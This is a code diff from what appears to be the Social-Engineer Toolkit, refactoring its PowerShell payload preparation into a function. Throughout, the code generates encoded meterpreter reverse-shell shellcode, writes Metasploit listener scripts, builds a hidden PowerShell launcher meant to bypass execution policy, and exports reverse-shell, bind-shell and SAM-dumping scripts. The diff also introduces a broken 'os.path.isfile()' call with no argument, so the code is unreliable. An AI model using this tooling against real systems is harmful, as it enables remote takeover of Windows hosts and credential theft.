diff --git a/src/core/payloadgen/create_payloads.py b/src/core/payloadgen/create_payloads.py index 88b0b153f..854c00654 100644 --- a/src/core/payloadgen/create_payloads.py +++ b/src/core/payloadgen/create_payloads.py @@ -10,6 +10,7 @@ import base64 from src.core.setcore import * from src.core.menu.text import * from src.core.dictionaries import * +from src.payloads.powershell.prep import prep_powershell_payload try: if len(check_options("IPADDR=")) > 2: @@ -599,10 +600,7 @@ try: if setshell_counter == 0: if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum": if os.path.isfile("%s/web_clone/index.html" % (setdir)): - try: - reload(src.payloads.powershell.prep) - except: - import src.payloads.powershell.prep + prep_powershell_payload() if os.path.isfile("%s/x86.powershell" % (setdir)): fileopen1 = open( "%s/x86.powershell" % (setdir), "r") diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py index 0b06edab4..66957f4bb 100644 --- a/src/fasttrack/mssql.py +++ b/src/fasttrack/mssql.py @@ -8,6 +8,7 @@ import subprocess import time import src.core.setcore as core import impacket.tds as tds +from src.payloads.powershell.prep import prep_powershell_payload #from src.core.payloadgen import create_payloads @@ -172,28 +173,25 @@ def deploy_hex2binary(ipaddr, port, username, password): if choice1 == "1": web_path = None - try: - core.module_reload(create_payloads) - except: - import src.core.payloadgen.create_payloads + prep_powershell_payload() - # if we are using a SET interactive shell payload then we need to make - # the path under web_clone versus ~./set - if os.path.isfile(os.path.join(core.setdir + "set.payload")): - web_path = os.path.join(core.setdir + "web_clone") - # then we are using metasploit - else: - if operating_system == "posix": - web_path = core.setdir - # if it isn't there yet - if not os.path.isfile(core.setdir + "1msf.exe"): - # move it then - subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % - (core.setdir, core.setdir), shell=True).wait() - subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % - (core.setdir, core.setdir), shell=True).wait() - subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % - (core.setdir, core.setdir), shell=True).wait() + # if we are using a SET interactive shell payload then we need to make + # the path under web_clone versus ~./set + if os.path.isfile(os.path.join(core.setdir + "set.payload")): + web_path = os.path.join(core.setdir + "web_clone") + # then we are using metasploit + else: + if operating_system == "posix": + web_path = core.setdir + # if it isn't there yet + if not os.path.isfile(core.setdir + "1msf.exe"): + # move it then + subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % + (core.setdir, core.setdir), shell=True).wait() + subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % + (core.setdir, core.setdir), shell=True).wait() + subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % + (core.setdir, core.setdir), shell=True).wait() payload_filename = os.path.join(web_path + "1msf.exe") with open(payload_filename, "rb") as fileopen: diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py index 4b2271c3d..c2bcdf761 100644 --- a/src/fasttrack/psexec.py +++ b/src/fasttrack/psexec.py @@ -8,6 +8,7 @@ import os import subprocess import src.core.setcore as core +from src.payloads.powershell.prep import prep_powershell_payload # Py2/3 compatibility # Python3 renamed raw_input to input @@ -74,10 +75,7 @@ try: core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") - try: - core.module_reload(src.payloads.powershell.prep) - except: - import src.payloads.powershell.prep + prep_powershell_payload() # create the directory if it does not exist if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): diff --git a/src/payloads/powershell/prep.py b/src/payloads/powershell/prep.py index 1a3483680..747e407a0 100644 --- a/src/payloads/powershell/prep.py +++ b/src/payloads/powershell/prep.py @@ -1,203 +1,199 @@ #!/usr/bin/env python -import sys -import subprocess -import re +# coding=utf-8 import os +import re import time -from src.core.setcore import * -# grab stage encoding flag -stage_encoding = check_config("STAGE_ENCODING=").lower() -if stage_encoding == "off": - stage_encoding = "false" -else: - stage_encoding = "true" +import src.core.setcore as core -# check to see if we are just generating powershell code -powershell_solo = check_options("POWERSHELL_SOLO") +# Py2/3 compatibility +# Python3 renamed raw_input to input +try: + input = raw_input +except NameError: + pass -# check if port is there -port = check_options("PORT=") +def prep_powershell_payload(): -# check if we are using auto_migrate -auto_migrate = check_config("AUTO_MIGRATE=") - -# check if we are using pyinjection -pyinjection = check_options("PYINJECTION=") -if pyinjection == "ON": - # check to ensure that the payload options were specified right - if os.path.isfile(setdir + "/payload_options.shellcode"): - pyinjection = "on" - print_status( - "Multi/Pyinjection was specified. Overriding config options.") + # grab stage encoding flag + stage_encoding = core.check_config("STAGE_ENCODING=").lower() + if stage_encoding == "off": + stage_encoding = "false" else: - pyinjection = "off" + stage_encoding = "true" -# grab ipaddress -if check_options("IPADDR=") != 0: - ipaddr = check_options("IPADDR=") -else: - ipaddr = input("Enter the ipaddress for the reverse connection: ") - update_options("IPADDR=" + ipaddr) + # check to see if we are just generating powershell code + powershell_solo = core.check_options("POWERSHELL_SOLO") -# check to see if we are using multi powershell injection -multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower() + # check if port is there + port = core.check_options("PORT=") -# turn off multi injection if pyinjection is specified -if pyinjection == "on": - multi_injection = "off" + # check if we are using auto_migrate + auto_migrate = core.check_config("AUTO_MIGRATE=") -# check what payloads we are using -powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=") + # check if we are using pyinjection + pyinjection = core.check_options("PYINJECTION=") + if pyinjection == "ON": + # check to ensure that the payload options were specified right + if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")): + pyinjection = "on" + core.print_status("Multi/Pyinjection was specified. Overriding config options.") + else: + pyinjection = "off" -# if we specified a hostname then default to reverse https/http -if validate_ip(ipaddr) == False: - powershell_inject_x86 = "windows/meterpreter/reverse_http" + # grab ipaddress + if core.check_options("IPADDR=") != 0: + ipaddr = core.check_options("IPADDR=") + else: + ipaddr = input("Enter the ipaddress for the reverse connection: ") + core.update_options("IPADDR=" + ipaddr) -# prompt what port to listen on for powershell then make an append to the current -# metasploit answer file -if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): - # if we have multi injection on, don't worry about these - if multi_injection != "on": - if pyinjection == "off": - print_status( - "POWERSHELL_INJECTION is set to ON with multi-pyinjector") - port = input(setprompt( - ["4"], "Enter the port for Metasploit to listen on for powershell [443]")) - if port == "": + # check to see if we are using multi powershell injection + multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower() + + # turn off multi injection if pyinjection is specified + if pyinjection == "on": + multi_injection = "off" + + # check what payloads we are using + powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=") + + # if we specified a hostname then default to reverse https/http + if not core.validate_ip(ipaddr): + powershell_inject_x86 = "windows/meterpreter/reverse_http" + + # prompt what port to listen on for powershell then make an append to the current + # metasploit answer file + if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): + # if we have multi injection on, don't worry about these + if multi_injection != "on" and pyinjection == "off": + core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector") + port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) + if not port: port = "443" - fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r") - data = fileopen.read() + with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen: + data = fileopen.read() match = re.search(port, data) if not match: - filewrite = open( - "%s/meta_config_multipyinjector" % (setdir), "a") - filewrite.write("\nuse exploit/multi/handler\n") - if auto_migrate == "ON": - filewrite.write( - "set AutoRunScript post/windows/manage/smart_migrate\n") - filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" % - (powershell_inject_x86, ipaddr, port, stage_encoding)) - filewrite.close() + with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: + filewrite.write("\nuse exploit/multi/handler\n") + if auto_migrate == "ON": + filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") + filewrite.write("set PAYLOAD {0}\n" + "set LHOST {1}\n" + "set LPORT {2}\n" + "set EnableStageEncoding {3}\n" + "set ExitOnSession false\n" + "exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding)) -# if we have multi injection on, don't worry about these -if multi_injection != "on": - if pyinjection == "off": + # if we have multi injection on, don't worry about these + if multi_injection != "on" and pyinjection == "off": # check to see if the meta config multi pyinjector is there - if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): - if check_options("PORT=") != 0: - port = check_options("PORT=") + if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): + if core.check_options("PORT=") != 0: + port = core.check_options("PORT=") # if port.options isnt there then prompt else: - port = input(setprompt( - ["4"], "Enter the port for Metasploit to listen on for powershell [443]")) - if port == "": + port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) + if not port: port = "443" - update_options("PORT=" + port) + core.update_options("PORT={0}".format(port)) -# turn off multi_injection if we are riding solo from the powershell menu -if powershell_solo == "ON": - multi_injection = "off" - pyinjection = "on" + # turn off multi_injection if we are riding solo from the powershell menu + if powershell_solo == "ON": + multi_injection = "off" + pyinjection = "on" -# if we are using multi powershell injection -if multi_injection == "on": - if pyinjection == "off": - print_status( - "Multi-Powershell-Injection is set to ON, this should be sweet...") + # if we are using multi powershell injection + if multi_injection == "on" and pyinjection == "off": + core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...") -# define a base variable -x86 = "" + # define a base variable + x86 = "" -# specify a list we will use for later -multi_injection_x86 = "" - -# here we do some funky loops so we don't need to rewrite the code below -if multi_injection == "on": - port = check_config("POWERSHELL_MULTI_PORTS=") - port = port.split(",") - -if multi_injection == "on": - # iterate through the ports, used for POWERSHELL_MULTI_PORTS - for ports in port: - # dont cycle through if theres a blank - if ports != "": - print_status( - "Generating x86-based powershell injection code for port: %s" % (ports)) - multi_injection_x86 = multi_injection_x86 + "," + \ - generate_powershell_alphanumeric_payload( - powershell_inject_x86, ipaddr, ports, x86) - - if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): - port_check = check_ports( - "%s/meta_config_multipyinjector" % (setdir), ports) - if port_check == False: - filewrite = open( - "%s/meta_config_multipyinjector" % (setdir), "a") - filewrite.write("\nuse exploit/multi/handler\n") - if auto_migrate == "ON": - filewrite.write( - "set AutoRunScript post/windows/manage/smart_migrate\n") - filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % ( - powershell_inject_x86, ipaddr, stage_encoding, ports)) - filewrite.close() - - # if we aren't using multi pyinjector - if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): - # if meta config isn't created yet then create it - if not os.path.isfile("%s/meta_config" % (setdir)): - filewrite = open("%s/meta_config" % (setdir), "w") - filewrite.write("") - filewrite.close() - port_check = check_ports("%s/meta_config" % (setdir), ports) - if port_check == False: - filewrite = open("%s/meta_config" % (setdir), "a") - filewrite.write("\nuse exploit/multi/handler\n") - if auto_migrate == "ON": - filewrite.write( - "set AutoRunScript post/windows/manage/smart_migrate\n") - filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % ( - powershell_inject_x86, ipaddr, stage_encoding, ports)) - filewrite.close() - -# here we do everything if pyinjection or multi pyinjection was specified -if pyinjection == "on": + # specify a list we will use for later multi_injection_x86 = "" - # read in the file we need for parsing - fileopen = open(setdir + "/payload_options.shellcode", "r") - payloads = fileopen.read()[:-1].rstrip() # strips an extra , - payloads = payloads.split(",") - # format: payloadport - for payload in payloads: + + # here we do some funky loops so we don't need to rewrite the code below + if multi_injection == "on": + port = core.check_config("POWERSHELL_MULTI_PORTS=") + port = port.split(",") + + if multi_injection == "on": + # iterate through the ports, used for POWERSHELL_MULTI_PORTS + for ports in port: + # dont cycle through if theres a blank + if ports: + core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports)) + multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86) + + if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): + port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports) + if not port_check: + with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: + filewrite.write("\nuse exploit/multi/handler\n") + if auto_migrate == "ON": + filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") + filewrite.write("set PAYLOAD {0}\n" + "set LHOST {1}\n" + "set EnableStageEncoding {2}\n" + "set LPORT {3}\n" + "set ExitOnSession false\n" + "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) + + # if we aren't using multi pyinjector + if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): + # if meta config isn't created yet then create it + if not os.path.isfile(): + with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite: + filewrite.write("") + port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports) + if not port_check: + with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite: + filewrite.write("\nuse exploit/multi/handler\n") + if auto_migrate == "ON": + filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") + filewrite.write("set PAYLOAD {0}\n" + "set LHOST {1}\n" + "set EnableStageEncoding {2}\n" + "set ExitOnSession false\n" + "set LPORT {3}\n" + "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) + + # here we do everything if pyinjection or multi pyinjection was specified + if pyinjection == "on": + injections = [] + # read in the file we need for parsing + with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen: + payloads = fileopen.read()[:-1].rstrip() # strips an extra , + payloads = payloads.split(",") # format: payloadport - payload = payload.split(" ") - powershell_inject_x86 = payload[0] - port = payload[1] - print_status("Generating x86-based powershell injection code...") - multi_injection_x86 = multi_injection_x86 + "," + \ - generate_powershell_alphanumeric_payload( - powershell_inject_x86, ipaddr, port, x86) + for payload in payloads: + # format: payloadport + payload = payload.split(" ") + powershell_inject_x86 = payload[0] + port = payload[1] + core.print_status("Generating x86-based powershell injection code...") + injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)) + multi_injection_x86 = ",".join(injections) -# if its turned to off -if multi_injection == "off": - if pyinjection == "off": - print_status("Generating x86-based powershell injection code...") - x86 = generate_powershell_alphanumeric_payload( - powershell_inject_x86, ipaddr, port, x86) + # if its turned to off + if multi_injection == "off" and pyinjection == "off": + core.print_status("Generating x86-based powershell injection code...") + x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86) -# if we are specifying multi powershell injection -if multi_injection == "on" or pyinjection == "on": - x86 = multi_injection_x86[1:] # remove comma at beginning + # if we are specifying multi powershell injection + if multi_injection == "on" or pyinjection == "on": + x86 = multi_injection_x86[1:] # remove comma at beginning -# check to see if we want to display the powershell command to the user -verbose = check_config("POWERSHELL_VERBOSE=") -if verbose.lower() == "on": - print_status("Printing the x86 based encoded code...") - time.sleep(3) - print(x86) + # check to see if we want to display the powershell command to the user + verbose = core.check_config("POWERSHELL_VERBOSE=") + if verbose.lower() == "on": + core.print_status("Printing the x86 based encoded code...") + time.sleep(3) + print(x86) -filewrite = open("%s/x86.powershell" % (setdir), "w") -filewrite.write(x86) -filewrite.close() -print_status("Finished generating powershell injection bypass.") -print_status("Encoded to bypass execution restriction policy...") + with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite: + filewrite.write(x86) + core.print_status("Finished generating powershell injection bypass.") + core.print_status("Encoded to bypass execution restriction policy...") diff --git a/src/powershell/__init__.py b/src/powershell/__init__.py index e69de29bb..9bad5790a 100644 --- a/src/powershell/__init__.py +++ b/src/powershell/__init__.py @@ -0,0 +1 @@ +# coding=utf-8 diff --git a/src/powershell/powershell.py b/src/powershell/powershell.py index 749c90a73..058b3fb95 100644 --- a/src/powershell/powershell.py +++ b/src/powershell/powershell.py @@ -1,145 +1,139 @@ #!/usr/bin/python +# coding=utf-8 # # # handle powershell payloads and get them ready # # # -from src.core.setcore import * +import os +import shutil +import subprocess + +import src.core.setcore as core from src.core.menu import text +from src.payloads.powershell.prep import prep_powershell_payload -me = mod_name() +# Py2/3 compatibility +# Python3 renamed raw_input to input +try: + input = raw_input +except NameError: + pass -debug_msg(me, "printing 'text.powershell menu'", 5) -show_powershell_menu = create_menu(text.powershell_text, text.powershell_menu) -powershell_menu_choice = input(setprompt(["29"], "")) +core.debug_msg(core.mod_name(), "printing 'text.powershell menu'", 5) + +show_powershell_menu = core.create_menu(text.powershell_text, text.powershell_menu) +powershell_menu_choice = input(core.setprompt(["29"], "")) if powershell_menu_choice != "99": # specify ipaddress of reverse listener - ipaddr = grab_ipaddress() - update_options("IPADDR=" + ipaddr) + ipaddr = core.grab_ipaddress() + core.update_options("IPADDR=" + ipaddr) # if we select alphanumeric shellcode if powershell_menu_choice == "1": - port = input( - setprompt(["29"], "Enter the port for the reverse [443]")) - if port == "": + port = input(core.setprompt(["29"], "Enter the port for the reverse [443]")) + if not port: port = "443" - update_options("PORT=" + port) - update_options("POWERSHELL_SOLO=ON") - print_status( - "Prepping the payload for delivery and injecting alphanumeric shellcode...") + core.update_options("PORT=" + port) + core.update_options("POWERSHELL_SOLO=ON") + core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") - filewrite = open(setdir + "/payload_options.shellcode", "w") - filewrite.write("windows/meterpreter/reverse_tcp " + port + ",") - filewrite.close() + with open(core.setdir + "/payload_options.shellcode", "w") as filewrite: + filewrite.write("windows/meterpreter/reverse_tcp {},".format(port)) - try: - module_reload(src.payloads.powershell.prep) - except: - import src.payloads.powershell.prep + prep_powershell_payload() # create the directory if it does not exist - if not os.path.isdir(setdir + "/reports/powershell"): - os.makedirs(setdir + "/reports/powershell") + if not os.path.isdir(core.setdir + "/reports/powershell"): + os.makedirs(core.setdir + "/reports/powershell") # here we format everything for us - x86 = open(setdir + "/x86.powershell", "r") - x86 = x86.read() + with open(core.setdir + "/x86.powershell") as fileopen: + x86 = fileopen.read() x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86 - print_status( - "If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) - filewrite = open( - setdir + "/reports/powershell/x86_powershell_injection.txt", "w") - filewrite.write(x86) - filewrite.close() + core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/"))) + with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite: + filewrite.write(x86) - choice = yesno_prompt( - "0", "Do you want to start the listener now [yes/no]: ") + choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ") if choice == 'NO': pass # if we want to start the listener if choice == 'YES': - filewrite = open(setdir + "/reports/powershell/powershell.rc", "w") - filewrite.write( - "use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port)) - filewrite.close() - msf_path = meta_path() - subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" % - (msf_path, setdir), shell=True).wait() + with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite: + filewrite.write("use multi/handler\n" + "set payload windows/meterpreter/reverse_tcp\n" + "set LPORT {0}\n" + "set LHOST 0.0.0.0\n" + "set ExitOnSession false\n" + "exploit -j".format(port)) - print_status( - "Powershell files can be found under %s/reports/powershell/" % (setdir)) - return_continue() + msf_path = core.meta_path() + subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), + os.path.join(core.setdir, "reports/powershell/powershell.rc")), + shell=True).wait() + + core.print_status("Powershell files can be found under {0}".format(os.path.join(core.setdir, "reports/powershell"))) + core.return_continue() # if we select powershell reverse shell if powershell_menu_choice == "2": # prompt for IP address and port - port = input( - setprompt(["29"], "Enter the port for listener [443]")) + port = input(core.setprompt(["29"], "Enter the port for listener [443]")) # default to 443 - if port == "": + if not port: port = "443" # open the reverse shell up - print_status("Rewriting the powershell reverse shell with options") - fileopen = open("src/powershell/reverse.powershell", "r") - data = fileopen.read() + core.print_status("Rewriting the powershell reverse shell with options") + with open("src/powershell/reverse.powershell") as fileopen: + data = fileopen.read() data = data.replace("IPADDRHERE", ipaddr) data = data.replace("PORTHERE", port) - print_status( - "Exporting the powershell stuff to %s/reports/powershell" % (setdir)) + core.print_status("Exporting the powershell stuff to {0}".format(os.path.join(core.setdir, "reports/powershell"))) # create the directory if it does not exist - if not os.path.isdir(setdir + "/reports/powershell"): - os.makedirs(setdir + "/reports/powershell") - filewrite = open( - setdir + "/reports/powershell/powershell.reverse.txt", "w") - filewrite.write(data) - filewrite.close() + if not os.path.isdir(core.setdir + "/reports/powershell"): + os.makedirs(core.setdir + "/reports/powershell") + with open(core.setdir + "/reports/powershell/powershell.reverse.txt", "w") as filewrite: + filewrite.write(data) - choice = yesno_prompt("0", "Do you want to start a listener [yes/no]") + choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]") if choice == "NO": - print_status( - "Have netcat or standard socket listener on port %s" % (port)) + core.print_status("Have netcat or standard socket listener on port {0}".format(port)) if choice == "YES": - socket_listener(port) + core.socket_listener(port) - return_continue() + core.return_continue() # if we select powershell bind shell if powershell_menu_choice == "3": - port = input( - setprompt(["29"], "Enter the port for listener [443]")) + port = input(core.setprompt(["29"], "Enter the port for listener [443]")) # open file - fileopen = open("src/powershell/bind.powershell", "r") - data = fileopen.read() + with open("src/powershell/bind.powershell") as fileopen: + data = fileopen.read() data = data.replace("PORTHERE", port) # create the directory if it does not exist - if not os.path.isdir(setdir + "/reports/powershell"): - os.makedirs(setdir + "/reports/powershell") - filewrite = open( - setdir + "/reports/powershell/powershell.bind.txt", "w") - filewrite.write(data) - filewrite.close() - print_status( - "The powershell program has been exported to %s/reports/powershell/" % (setdir)) - return_continue() + if not os.path.isdir(core.setdir + "/reports/powershell"): + os.makedirs(core.setdir + "/reports/powershell") + with open(core.setdir + "/reports/powershell/powershell.bind.txt", "w") as filewrite: + filewrite.write(data) + core.print_status("The powershell program has been exported to {0}".format(os.path.join(core.setdir, "reports/powershell/"))) + core.return_continue() # if we select powershell powerdump SAM dump if powershell_menu_choice == "4": # create the directory if it does not exist - if not os.path.isdir(setdir + "/reports/powershell"): - os.makedirs(setdir + "/reports/powershell") + if not os.path.isdir(core.setdir + "/reports/powershell"): + os.makedirs(core.setdir + "/reports/powershell") # copy file if os.path.isfile("src/powershell/powerdump.encoded"): - shutil.copyfile("src/powershell/powerdump.encoded", - setdir + "/reports/powershell/powerdump.encoded.txt") - print_status( - "The powershell program has been exported to %s/reports/powershell/" % (setdir)) - print_status( - "Note with PowerDump -- You MUST be running as SYSTEM when executing.") - return_continue() + shutil.copyfile("src/powershell/powerdump.encoded", core.setdir + "/reports/powershell/powerdump.encoded.txt") + core.print_status("The powershell program has been exported to {}".format(os.path.join(core.setdir, "reports/powershell"))) + core.print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.") + core.return_continue()